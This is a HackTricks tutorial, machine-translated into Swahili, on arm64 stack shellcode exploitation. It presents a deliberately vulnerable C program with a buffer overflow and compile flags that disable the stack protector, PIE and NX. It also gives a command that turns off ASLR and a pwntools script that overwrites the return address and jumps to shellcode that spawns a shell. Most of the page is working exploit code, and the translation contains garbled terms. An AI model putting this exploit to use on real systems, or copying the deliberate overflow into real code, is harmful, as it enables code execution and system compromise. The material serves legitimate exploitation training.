Stack Shellcode - arm64

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Pata utangulizi wa arm64 katika:

Msimbo

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Kusanya bila pie, kifaru na nx:

```bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack ``` ## Hakuna ASLR & Hakuna kengele - Kujaza Kumbukumbu

Ili kusitisha ASLR tekeleza:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ili kupata offset ya bof tazama kiungo hiki.

Tumia:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Kitu pekee "cha kuf complicated" kupata hapa ni anwani kwenye stack ya kuita. Kwenye kesi yangu nilizalisha exploit na anwani niliyoipata kwa kutumia gdb, lakini kisha nilipokuwa nikiiharibu haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).

Nilifungua faili ya core iliyozalishwa (gdb ./bog ./core) na nikachunguza anwani halisi ya mwanzo wa shellcode.

Last updated